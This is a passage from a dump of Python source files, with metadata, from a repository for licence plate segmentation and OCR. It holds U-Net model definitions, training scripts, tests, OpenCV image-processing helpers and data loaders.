"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import (\n Conv2D, Conv2DTranspose,\n Lambda, Input,\n MaxPooling2D, concatenate,\n)\n\n\ndef identity_function(x):\n return x\n\n\ndef normalize_image_shape(height, width):\n base = (2 ** 4)\n width = (width // base) * base + base * int(width > 0)\n height = (height // base) * base + base * int(height > 0)\n return height, width\n\n\ndef get_model_definition(img_height, img_width, in_channels, out_channels):\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n inputs = Input((img_height, img_width, in_channels))\n pre_processing = Lambda(lambda x: x / 255)(inputs)\n kwargs_conv2d = {\n 'kernel_size': (3, 3),\n 'activation': tf.keras.layers.LeakyReLU(alpha=0.1),\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n }\n h_dim = 10 # 100\n outs = {\n 1: h_dim, # 64\n 2: h_dim,\n 3: h_dim,\n 4: h_dim,\n 5: h_dim,\n }\n # Down\n c1 = Conv2D(outs[1], **kwargs_conv2d)(pre_processing)\n c1 = Conv2D(outs[1], **kwargs_conv2d)(c1)\n c2 = MaxPooling2D((2, 2))(c1)\n c2 = Conv2D(outs[2], **kwargs_conv2d)(c2)\n c2 = Conv2D(outs[2], **kwargs_conv2d)(c2)\n c3 = MaxPooling2D((2, 2))(c2)\n c3 = Conv2D(outs[3], **kwargs_conv2d)(c3)\n c3 = Conv2D(outs[3], **kwargs_conv2d)(c3)\n c4 = MaxPooling2D((2, 2))(c3)\n c4 = Conv2D(outs[4], **kwargs_conv2d)(c4)\n c4 = Conv2D(outs[4], **kwargs_conv2d)(c4)\n c5 = MaxPooling2D(pool_size=(2, 2))(c4)\n c5 = Conv2D(outs[5], **kwargs_conv2d)(c5)\n c5 = Conv2D(outs[5], **kwargs_conv2d)(c5)\n # Up\n u4 = Conv2DTranspose(outs[4], (2, 2), strides=(2, 2), padding='same')(c5)\n u4 = concatenate([u4, c4])\n u4 = Conv2D(outs[4], **kwargs_conv2d)(u4)\n u4 = Conv2D(outs[4], **kwargs_conv2d)(u4)\n u3 = Conv2DTranspose(outs[3], (2, 2), strides=(2, 2), padding='same')(u4)\n u3 = concatenate([u3, c3])\n u3 = Conv2D(outs[3], **kwargs_conv2d)(u3)\n u3 = Conv2D(outs[3], **kwargs_conv2d)(u3)\n u2 = Conv2DTranspose(outs[2], (2, 2), strides=(2, 2), padding='same')(u3)\n u2 = concatenate([u2, c2])\n u2 = Conv2D(outs[2], **kwargs_conv2d)(u2)\n u2 = Conv2D(outs[2], **kwargs_conv2d)(u2)\n u1 = Conv2DTranspose(outs[1], (2, 2), strides=(2, 2), padding='same')(u2)\n u1 = concatenate([u1, c1], axis=3)\n u1 = Conv2D(outs[1], **kwargs_conv2d)(u1)\n u1 = Conv2D(outs[1], **kwargs_conv2d)(u1)\n # Downward\n kwargs_conv2d = {\n 'activation': tf.keras.layers.LeakyReLU(alpha=0.1), # 'relu',\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n 'kernel_regularizer': tf.keras.regularizers.l1(0.001), # 'l1',\n }\n k_size = (3,) * 2\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(u1)\n x = MaxPooling2D((2, 2))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 2))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 2))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 2))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 1))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n x = MaxPooling2D((2, 1))(x)\n x = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n outputs = Conv2D(out_channels, kernel_size=(1, 1), activation='sigmoid')(x)\n # Model compilation\n model = Model(inputs=[inputs], outputs=[outputs])\n model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n pre_process_input = identity_function\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.6140684485435486,
"alphanum_fraction": 0.6273764371871948,
"avg_line_length": 29.941177368164062,
"blob_id": "b98e53918223772b322293a76c31f77a0c387c96",
"content_id": "e8fe0a50ec9f63711acf68e6936813709ec31da5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1578,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 51,
"path": "/services/plate_segmentation/training_pytorch.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import pathlib\n\nimport numpy as np\nfrom loguru import logger\n\nfrom cv.pytorch.pytorch_utils import train_model\nfrom cv.pytorch.unet_small import UNetSmall\nfrom io_utils.data_source import get_image_label, get_plates_bounding_metadata\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data/'\n folder = f'{path}/plates'\n dsize = (572, 572)\n params = {\n 'folder': folder,\n 'epochs': 1000,\n 'dsize': dsize,\n 'im_channels': 3,\n 'model_folder': f'{folder}/model',\n 'model_file': f'{folder}/model/best_model.model',\n 'labels': f\"{folder}/labels_plates.csv\",\n 'metadata': f\"{folder}/files.csv\",\n 'model_params': {\n 'in_channels': 3,\n 'out_channels': 2,\n },\n }\n return params\n\n\ndef train_plate_segmentation(params):\n dsize = params['dsize']\n folder = params['folder']\n metadata = get_plates_bounding_metadata(params)\n train_meta = metadata.query(\"set == 'train'\")\n test_meta = metadata.query(\"set == 'test'\")\n train_meta = set_index(train_meta)\n test_meta = set_index(test_meta)\n x_train, y_train = get_image_label(folder, train_meta, dsize)\n x_val, y_val = get_image_label(folder, test_meta, dsize)\n x_train = x_train.astype(np.float32)\n y_train = y_train.astype(np.float32)\n x_val = x_val.astype(np.float32)\n y_val = y_val.astype(np.float32)\n train_model(x_train, y_train, x_val, y_val, UNetSmall, params, logger)\n\n\nif __name__ == \"__main__\":\n train_plate_segmentation(get_params())\n"
},
{
"alpha_fraction": 0.6125984191894531,
"alphanum_fraction": 0.6362204551696777,
"avg_line_length": 20.89655113220215,
"blob_id": "0e91d24fec7d2f3f7b6f69b71177646fc0673cd6",
"content_id": "b69d95a167451a02d3c36233d486b8f9c4aec13e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 29,
"path": "/io_utils/tests/test_data_source.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport pathlib\n\nfrom io_utils.data_source import get_plates_text_metadata\n\n\ndef get_params():\n path = str(pathlib.Path().absolute().parent.parent)\n folder = f'{path}/data/plates'\n params = {\n 'folder': folder,\n 'labels': f\"{folder}/output_plate_segmentation/labels_plates_text-name_20200724050222.json\",\n 'metadata': f\"{folder}/files.csv\",\n }\n return params\n\n\ndef test_get_plates_text_metadata():\n params = get_params()\n plates_text_metadata = get_plates_text_metadata(params)\n a = 0\n\n\nif __name__ == \"__main__\":\n test_get_plates_text_metadata()\n"
},
{
"alpha_fraction": 0.5582290887832642,
"alphanum_fraction": 0.5851780772209167,
"avg_line_length": 26.342105865478516,
"blob_id": "6a123ee2d7a378e6dc227f6916544a35783774db",
"content_id": "5e2609a2896d83c4b9272651cdf43a952dac2516",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1039,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 38,
"path": "/cv/tensorflow_models/tests/test_unet_tensorflow.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\nimport numpy as np\n\nfrom cv.tensorflow_models.unet import get_model_definition\nfrom cv.tensorflow_models.tensorflow_utils import train_model\n\n\ndef test_train_model():\n from loguru import logger\n\n logger.info(f\"Start\")\n dsize = (576, 576)\n params = {\n 'dsize': dsize,\n 'im_channels': 1,\n 'epochs': 2,\n 'model_file': 'test.model',\n 'model_folder': './',\n }\n x_train = np.random.rand(1, dsize[0], dsize[1], 1)\n y_train = np.random.rand(1, dsize[0], dsize[1], 2)\n x_val = np.random.rand(1, dsize[0], dsize[1], 1)\n y_val = np.random.rand(1, dsize[0], dsize[1], 2)\n logger.info(f\"Call to train_model\")\n model_params = {\n 'img_height': dsize[0],\n 'img_width': dsize[1],\n 'in_channels': 1,\n 'out_channels': 2,\n }\n trained_model = train_model(\n x_train, y_train, x_val, y_val, get_model_definition, model_params,\n params, logger)\n assert trained_model is not None\n print(trained_model)\n"
},
{
"alpha_fraction": 0.6420056223869324,
"alphanum_fraction": 0.6490182280540466,
"avg_line_length": 40.33333206176758,
"blob_id": "1f9aa5c1d208a8c34e74b7e6f4ab830cef83ef7f",
"content_id": "d1921dbfe407677f5c27f5e0ab18f1854b0161f1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2852,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 69,
"path": "/services/plate_segmentation/training_tensorflow.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "from loguru import logger\n\nfrom cv.tensorflow_models.tensorflow_utils import train_model\nfrom cv.tensorflow_models.unet_little import get_model_definition\nfrom io_utils.data_source import (\n get_image_label, get_filenames,\n get_segmentation_labels)\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/input'\n output_folder = f'{path}/plates/plate_segmentation'\n # dsize = (576, 576)\n dsize = (256, 256)\n alphabet = [' ', 'plate']\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n in_channels = 3\n out_channels = len(alphabet)\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'epochs': 1000,\n 'dsize': dsize,\n 'model_folder': f'{output_folder}/model',\n 'model_file': f'{output_folder}/model/best_model.h5',\n 'labels': f\"{input_folder}/labels/segmentation\",\n 'alphabet': alphabet,\n 'model_params': {\n 'img_height': dsize[0],\n 'img_width': dsize[1],\n 'in_channels': in_channels,\n 'out_channels': out_channels,\n },\n }\n return params\n\n\ndef train_plate_segmentation(params):\n dsize = params['dsize']\n in_channels = params['model_params']['in_channels']\n out_channels = params['model_params']['out_channels']\n input_folder = params['input_folder']\n\n train_meta = get_filenames(f\"{input_folder}/train\")\n test_meta = get_filenames(f\"{input_folder}/test\")\n logger.info(f\"Train meta shape: {train_meta.shape}\")\n logger.info(f\"Test meta shape: {test_meta.shape}\")\n labels = get_segmentation_labels(params['labels'])\n train_meta = train_meta.merge(labels, on=['file_name'], how='left')\n test_meta = test_meta.merge(labels, on=['file_name'], how='left')\n train_meta = train_meta.loc[train_meta.label.notnull()]\n test_meta = test_meta.loc[test_meta.label.notnull()]\n train_meta = train_meta.sort_values(by=['file_name', 'date'], ascending=[False, False])\n test_meta = test_meta.sort_values(by=['file_name', 'date'], ascending=[False, False])\n train_meta = train_meta.drop_duplicates(subset=['file_name'])\n test_meta = test_meta.drop_duplicates(subset=['file_name'])\n train_meta = set_index(train_meta)\n test_meta = set_index(test_meta)\n logger.info(f\"Train meta shape: {train_meta.shape}\")\n logger.info(f\"Test meta shape: {test_meta.shape}\")\n x_train, y_train = get_image_label(input_folder, train_meta, dsize, in_channels, out_channels, params)\n x_val, y_val = get_image_label(input_folder, test_meta, dsize, in_channels, out_channels, params)\n train_model(x_train, y_train, x_val, y_val, get_model_definition, params, logger)\n\n\nif __name__ == \"__main__\":\n train_plate_segmentation(get_params())\n"
},
{
"alpha_fraction": 0.5378527045249939,
"alphanum_fraction": 0.571403980255127,
"avg_line_length": 25.660551071166992,
"blob_id": "027a8dd7237a6c459d2db867bf5cc59b5819aa5f",
"content_id": "7236cbd7d4579897083ba80444897c433708a0a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5812,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 218,
"path": "/cv/image_processing.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nimport math\nfrom PIL import Image\n\n\ndef save_image(im, filename):\n im = Image.fromarray(im)\n im.save(filename)\n\n\ndef get_contours_rgb(im, min_area, max_area):\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n hulls = get_contours_gray(im, min_area, max_area)\n return hulls\n\n\ndef get_contours_gray(im, min_area, max_area):\n ret, thresh = cv2.threshold(im, 50, 255, cv2.THRESH_BINARY)\n hulls = get_contours_binary(thresh, min_area, max_area)\n return hulls\n\n\ndef get_contours_binary(im, min_area, max_area):\n contours, hierarchy = cv2.findContours(im, cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = [c for c in contours if cv2.contourArea(c) > min_area]\n contours = [c for c in contours if cv2.contourArea(c) < max_area]\n hulls = []\n for i in range(len(contours)):\n hulls.append(cv2.convexHull(contours[i], False))\n return hulls\n\n\ndef get_lines(edges_im):\n lines = cv2.HoughLinesP(\n image=edges_im,\n rho=1,\n theta=1 * np.pi / 180,\n threshold=50,\n minLineLength=50,\n maxLineGap=10)\n return lines\n\n\ndef draw_lines(im, lines):\n color = (0, 255, 0)\n if lines is not None:\n for line in lines:\n for x1, y1, x2, y2 in line:\n cv2.line(im, (x1, y1), (x2, y2), color, 2)\n return im\n\n\ndef pred2im(im_set, dsize, image_idx, in_channels):\n if in_channels == 3:\n im = np.zeros((dsize[0], dsize[1], in_channels))\n im[:, :, 0] = im_set[image_idx, :, :, 0]\n im[:, :, 1] = im_set[image_idx, :, :, 0]\n im[:, :, 2] = im_set[image_idx, :, :, 0]\n else:\n im = np.zeros((dsize[0], dsize[1]))\n im[:, :] = im_set[image_idx, :, :, 0]\n im = im.astype('uint8')\n return im\n\n\ndef image_set2list(y_train_pred, y_val_pred):\n images = []\n for im_set in [y_train_pred, y_val_pred]:\n dsize = im_set.shape[1:3]\n for image_idx in range(im_set.shape[0]):\n im = pred2im(im_set, dsize, image_idx)\n images.append(im)\n return images\n\n\ndef get_rectangle(contours):\n rectangle = None\n if len(contours) > 0:\n contour = contours[0]\n rectangle = cv2.minAreaRect(contour)\n rectangle = cv2.boxPoints(rectangle)\n rectangle = np.int0(rectangle)\n return rectangle\n\n\ndef get_xs(rectangle):\n result = list(rectangle)\n c = np.mean(rectangle, axis=0)\n result.sort(key=lambda p: math.degrees(math.atan2(p[0] - c[0], -(p[1] - c[1]))))\n return result\n\n\ndef get_polygon(contour):\n epsilon = 0.1 * cv2.arcLength(contour, True)\n polygon = cv2.approxPolyDP(contour, epsilon, True)\n return polygon\n\n\ndef get_quadrilateral(contour):\n max_area = 0\n quadrilateral = None\n epochs = 2000\n contour = contour.reshape((-1, 2))\n for it in range(epochs):\n idxs = np.random.choice(range(len(contour)), size=4, replace=False)\n points = contour[idxs, :]\n area = cv2.contourArea(points)\n if area > max_area:\n max_area = area\n quadrilateral = points\n return quadrilateral\n\n\ndef get_warping(q, plate_shape):\n warp = None\n if q is not None:\n w, h = plate_shape\n p1 = [0, 0]\n p2 = [w - 1, 0]\n p3 = [w - 1, h - 1]\n p0 = [0, h - 1]\n dst = np.array([p1, p2, p3, p0], dtype=np.float32)\n x0, x1, x2, x3 = get_xs(q)\n q = np.array([x1, x2, x3, x0], dtype=np.float32)\n warp = cv2.getPerspectiveTransform(q, dst)\n return warp\n\n\ndef warp_image(im, warp, plate_shape):\n if warp is not None:\n im = cv2.warpPerspective(im, warp, plate_shape)\n return im\n\n\ndef rotate_image(image, center, theta):\n \"\"\"\n Rotates image around center with angle theta in radians\n \"\"\"\n\n theta_degrees = theta * 180 / np.pi\n shape = (image.shape[1], image.shape[0])\n center = tuple(center)\n matrix = cv2.getRotationMatrix2D(\n center=center, angle=theta_degrees, scale=1)\n image = cv2.warpAffine(src=image, M=matrix, dsize=shape)\n return image\n\n\ndef crop_image(im, rectangle):\n x0, x1, x2, x3 = rectangle\n w = np.linalg.norm(x3 - x0)\n h = np.linalg.norm(x1 - x0)\n cx, cy = x1\n dh = 5\n dw = 5\n im = im[max(0, cy - dh):min(im.shape[1], int(cy + h + dh)),\n max(0, cx - dw):min(im.shape[1], int(cx + w + dw))]\n return im\n\n\ndef get_theta(x0, x3):\n tan_theta = (x3[1] - x0[1]) / (x3[0] - x0[0])\n theta = np.arctan(tan_theta)\n return theta\n\n\ndef print_images(images, metadata, folder, name, logger):\n logger.info(f\"Saving {name} images\")\n for image_filename, im in zip(metadata.file_name, images):\n image_name = image_filename.split('.')[0]\n save_image(im, f\"{folder}/{name}_{image_name}.png\")\n\n\ndef has_dark_font(im):\n h, w = im.shape\n low_t = 0.1\n high_t = 0.9\n im = im[int(low_t * h):int(high_t * h), int(low_t * w):int(high_t * w)]\n im = cv2.threshold(im, im.mean(), 255, cv2.THRESH_BINARY)[1]\n result = im.mean() > 255 / 2\n return result\n\n\ndef get_binary_im(im):\n if im is not None:\n im = cv2.threshold(im, np.median(im), 255, cv2.THRESH_BINARY)[1]\n return im\n\n\ndef get_center_point(r):\n if r is not None:\n r = r.mean(axis=0).astype(int)\n return r\n\n\ndef get_y_limits(im):\n borders = ~(im[:, :, 0].mean(axis=1) > 0.20 * 255)\n return borders\n\n\ndef print_limits(im):\n borders = ~(im.mean(axis=1) > 0.20 * 255)\n mp = int(len(im) / 2)\n up, lp = None, None\n for idx in range(mp, 0, -1):\n if borders[idx]:\n up = idx\n break\n for idx in range(mp, len(im), 1):\n if borders[idx]:\n lp = idx\n break\n if up is not None and lp is not None:\n im[0:up, :] = 0\n im[lp:len(im), :] = 0\n return im\n"
},
{
"alpha_fraction": 0.5805470943450928,
"alphanum_fraction": 0.6013373732566833,
"avg_line_length": 35.074562072753906,
"blob_id": "674561748a093da44d907f60ac65e5e127344f8d",
"content_id": "0bbd51ea5c1fa0e585aeb80b4169592858afccce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8225,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 228,
"path": "/io_utils/data_source.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nimport pandas as pd\nimport glob\n\nfrom cv.image_processing import get_xs\nfrom io_utils.read_polygons_json import get_labels_plates_text\n\n\ndef load_image(im_data, folder, dsize, in_channels):\n dsize_cv2 = (dsize[1], dsize[0])\n image = im_data.file_name\n im_file = f\"{folder}/{image}\"\n im = cv2.imread(im_file)\n assert im is not None, f\"Error while reading image: {im_file}\"\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n if in_channels == 3:\n im = cv2.cvtColor(im, cv2.COLOR_GRAY2RGB)\n im = cv2.resize(im, dsize=dsize_cv2, interpolation=cv2.INTER_CUBIC)\n return im\n\n\ndef load_image_label(im_data, folder, dsize, in_channels, alphabet):\n dsize_cv2 = (dsize[1], dsize[0])\n im_file = im_data.file_path.values[0]\n # Image load\n im = cv2.imread(im_file)\n assert im is not None, f\"Error while reading image: {im_file}\"\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n im_shape = (im.shape[0], im.shape[1])\n if in_channels == 3:\n im = cv2.cvtColor(im, cv2.COLOR_GRAY2RGB)\n im = cv2.resize(im, dsize=dsize_cv2, interpolation=cv2.INTER_CUBIC)\n # Setting labels\n gt = np.zeros((dsize[0], dsize[1], len(alphabet)))\n gt = gt.astype('uint8')\n for row in im_data.itertuples():\n im_label, label_idx = get_labels(alphabet, dsize_cv2, im_shape, row)\n gt[:, :, label_idx] = im_label\n # Filling the zero class (non in the alphabet)\n gt_zero = gt.max(axis=2)\n gt_zero = (gt_zero == 0.0).astype(int)\n gt[:, :, 0] = gt_zero\n return im, gt\n\n\ndef get_labels(alphabet, dsize_cv2, im_shape, row):\n label = row.label\n label_idx = alphabet[label]\n p0 = row.x0, row.y0\n p1 = row.x1, row.y1\n p2 = row.x2, row.y2\n p3 = row.x3, row.y3\n pts = np.array([p0, p1, p2, p3], np.int32)\n pts = list(get_xs(pts))\n pts = np.array(pts, np.int32)\n pts = [pts.reshape((-1, 1, 2))]\n im_label = np.zeros(im_shape)\n cv2.fillPoly(im_label, pts, color=1)\n im_label = cv2.resize(im_label, dsize=dsize_cv2, interpolation=cv2.INTER_CUBIC)\n return im_label, label_idx\n\n\ndef get_image_label(folder, metadata, dsize, in_channels, out_channels, params):\n alphabet = params['alphabet']\n image_name_list = metadata.file_name.unique()\n set_size = len(image_name_list)\n x = np.zeros((set_size, dsize[0], dsize[1], in_channels))\n y = np.zeros((set_size, dsize[0], dsize[1], out_channels))\n for image_name in image_name_list:\n image_data = metadata.loc[metadata.file_name == image_name]\n idx = image_data.idx.values[0]\n im, gt = load_image_label(image_data, folder, dsize, in_channels, alphabet)\n if in_channels == 3:\n x[idx, :, :, :] = im[:, :, 0:in_channels]\n else:\n x[idx, :, :, 0] = im[:, :]\n y[idx, :, :, :] = gt\n return x, y\n\n\ndef get_image(filename, dsize, in_channels):\n x = np.zeros((1, dsize[0], dsize[1], in_channels))\n dsize_cv2 = (dsize[1], dsize[0])\n # Image load\n im = cv2.imread(filename)\n assert im is not None, f\"Error while reading image: {filename}\"\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n if in_channels == 3:\n im = cv2.cvtColor(im, cv2.COLOR_GRAY2RGB)\n im = cv2.resize(im, dsize=dsize_cv2, interpolation=cv2.INTER_CUBIC)\n if in_channels == 3:\n x[0, :, :, :] = im[:, :, 0:in_channels]\n else:\n x[0, :, :, 0] = im[:, :]\n return x\n\n\ndef get_image_text_label(folder, metadata, dsize, in_channels, out_channels, alphabet):\n image_name_list = metadata.image_name.unique()\n set_size = len(image_name_list)\n text_max_len = 13\n x = np.zeros((set_size, dsize[0], dsize[1], in_channels))\n y = np.zeros((set_size, 1, text_max_len, out_channels))\n for row in metadata.itertuples():\n plate_text = row.plate.lower()\n plate_text = f\"{plate_text: <{text_max_len}}\"\n idx = row.idx\n for idx_letter in range(text_max_len):\n label = plate_text[idx_letter]\n label_idx = alphabet[label]\n y[idx, 0, idx_letter, label_idx] = 1.0\n im = np.zeros((dsize[0], dsize[1], in_channels))\n if in_channels == 1:\n im = np.zeros((dsize[0], dsize[1]))\n try:\n im = load_image(row, folder, dsize, in_channels)\n except Exception as e:\n pass\n if in_channels == 3:\n x[idx, :, :, :] = im[:, :, 0:in_channels]\n else:\n x[idx, :, :, 0] = im[:, :]\n return x, y\n\n\ndef generate_txt(inv_alphabet):\n text_len = np.random.randint(4, 10)\n text = np.random.randint(len(inv_alphabet), size=text_len)\n text = [inv_alphabet[idx] for idx in text]\n text = ''.join(text)\n text = text.upper()\n return text\n\n\ndef get_image_text_label_sim(dsize, in_channels, out_channels, alphabet):\n inv_alphabet = {alphabet[char]: char for char in alphabet.keys()}\n set_size = 1000\n text_max_len = 13\n font = cv2.FONT_HERSHEY_TRIPLEX\n clr = (255, 255, 255)\n pos = (30, 30)\n line = cv2.LINE_AA\n x = np.zeros((set_size, dsize[0], dsize[1], in_channels))\n y = np.zeros((set_size, 1, text_max_len, out_channels))\n for idx in range(set_size):\n plate_text = generate_txt(inv_alphabet)\n plate_text = f\"{plate_text: <{text_max_len}}\"\n plate_text_buff = plate_text.lower()\n for idx_letter in range(text_max_len):\n label = plate_text_buff[idx_letter]\n label_idx = alphabet[label]\n y[idx, 0, idx_letter, label_idx] = 1.0\n im = np.zeros((dsize[0], dsize[1])).astype('uint8')\n im = cv2.cvtColor(im, cv2.COLOR_GRAY2RGB)\n im = cv2.putText(im, plate_text, pos, font, 1, clr, 2, line)\n if im.shape[2] == 3:\n x[idx, :, :, :] = im[:, :, 0:in_channels]\n else:\n x[idx, :, :, 0] = im[:, :]\n return x, y\n\n\ndef load_label_data(labels):\n labels = labels.groupby(['filename']).apply(\n lambda x: x.assign(point_idx=range(len(x)))).reset_index(drop=True)\n labels_x = labels.pivot(\n index='filename',\n columns='point_idx',\n values='x'\n )\n labels_x.columns = [f\"x{c}\" for c in labels_x.columns]\n labels_x = labels_x.reset_index(drop=False)\n labels_y = labels.pivot(\n index='filename',\n columns='point_idx',\n values='y'\n )\n labels_y.columns = [f\"y{c}\" for c in labels_y.columns]\n labels_y = labels_y.reset_index(drop=False)\n labels_wh = labels.drop_duplicates(['filename'])[['filename', 'w', 'h']]\n labels2 = labels_wh.merge(labels_x, on=['filename'], how='left')\n labels2 = labels2.merge(labels_y, on=['filename'], how='left')\n return labels2\n\n\ndef get_plates_bounding_metadata(params):\n metadata = params['metadata']\n labels = params['labels']\n metadata = pd.read_csv(metadata)\n labels = pd.read_csv(labels, sep=',')\n labels = load_label_data(labels)\n labels = labels.rename(columns={'filename': 'image'})\n metadata = metadata.merge(labels, on=['image'], how='left')\n return metadata\n\n\ndef get_filenames(path):\n files = glob.glob(f\"{path}/*.jpg\")\n files = pd.Series(files)\n files = files.rename('file_path')\n files = files.to_frame()\n file_name = files.file_path.str.split('/').str[-1]\n file_name = file_name.str.split('.').str[0]\n files = files.assign(file_name=file_name)\n return files\n\n\ndef get_segmentation_labels(path):\n labels = glob.glob(f\"{path}/*.json\")\n dates = [label.split('/')[-1] for label in labels]\n dates = [date.split('.')[0] for date in dates]\n dates = [date.split('_')[-1] for date in dates]\n labels = [get_labels_plates_text(label) for label in labels]\n labels = [label.assign(date=date) for label, date in zip(labels, dates)]\n labels = pd.concat(labels, axis=0)\n labels = labels.rename(columns={'filename': 'file_name'})\n labels.file_name = labels.file_name.str.split('.').str[0]\n return labels\n\n\ndef get_plates_text_metadata(params):\n metadata = params['metadata']\n metadata = pd.read_csv(metadata)\n metadata = metadata.assign(image_name=metadata.file_name)\n metadata.image_name = metadata.image_name.str.split('.').str[0]\n metadata.image_name = metadata.image_name.str.split('_').str[-1]\n return metadata\n"
},
{
"alpha_fraction": 0.6076208353042603,
"alphanum_fraction": 0.6211895942687988,
"avg_line_length": 37.156028747558594,
"blob_id": "24ea7a447e0314c6abfedf831102f5520a3bd339",
"content_id": "ae2056b70efeb89a2ceeb30f3b3fb831c14f44a8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5380,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 141,
"path": "/services/plate_ocr/training_image_captioning.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nfrom loguru import logger\n\nfrom io_utils.data_source import (\n get_plates_text_metadata,\n get_image_text_label,\n)\nfrom io_utils.image_text_label_generator import ImageTextLabelGenerator\nfrom io_utils.utils import set_index\nfrom cv.tensorflow_models.cnn_encoder import CNN_Encoder\nfrom cv.tensorflow_models.rnn_decoder import RNN_Decoder\nfrom cv.tensorflow_models.unet2text2 import (\n get_model_definition,\n normalize_image_shape\n)\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/plate_segmentation'\n output_folder = f'{path}/plates/plate_ocr'\n width = 200\n height = 50\n height, width = normalize_image_shape(height, width)\n # height = height + 1\n # width = width + 1\n dsize = (height, width)\n alphabet = ' abcdefghijklmnopqrstuvwxyz0123456789'\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n in_channels = 1\n out_channels = len(alphabet)\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'epochs': 1 * 1000,\n 'dsize': dsize,\n 'model_folder': f'{output_folder}/model',\n 'model_file': f'{output_folder}/model/best_model.h5',\n 'metadata': f\"{path}/plates/input/labels/ocr/files.csv\",\n 'alphabet': alphabet,\n 'model_params': {\n 'img_height': dsize[0],\n 'img_width': dsize[1],\n 'in_channels': in_channels,\n 'out_channels': out_channels,\n },\n }\n return params\n\n\ndef loss_function(real, pred):\n loss_object = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True, reduction='none')\n mask = tf.math.logical_not(tf.math.equal(real, 0))\n loss_ = loss_object(real, pred)\n mask = tf.cast(mask, dtype=loss_.dtype)\n loss_ *= mask\n return tf.reduce_mean(loss_)\n\n\ndef train_ocr_model(params):\n embedding_dim = 10\n units = 20\n vocab_size = len(params['alphabet'])\n num_steps = 10\n alphabet = '*- abcdefghijklmnopqrstuvwxyz0123456789' # {*: start, -: end}\n word_index = {char: idx for idx, char in enumerate(alphabet)}\n index_word = {idx: char for idx, char in enumerate(alphabet)}\n\n img_height = 16 * 4\n img_width = 16 * 16\n encoder = CNN_Encoder(embedding_dim, img_height, img_width)\n decoder = RNN_Decoder(embedding_dim, units, vocab_size)\n optimizer = tf.keras.optimizers.Adam()\n loss_plot = []\n\n @tf.function\n def train_step(img_tensor, target):\n loss = 0\n \"\"\"\n Reset of the hidden state for each batch\n \"\"\"\n batch_size = target.shape[0]\n sentence_len = target.shape[2]\n hidden = decoder.reset_state(batch_size=batch_size)\n dec_input = tf.expand_dims([word_index['*']] * batch_size, 1)\n with tf.GradientTape() as tape:\n features = encoder(img_tensor)\n for idx in range(1, sentence_len):\n # Passing the features through the decoder\n predictions, hidden, _ = decoder(dec_input, features, hidden)\n # print(1, predictions.numpy())\n target_char = tf.reshape(target[0, 0, idx, :], 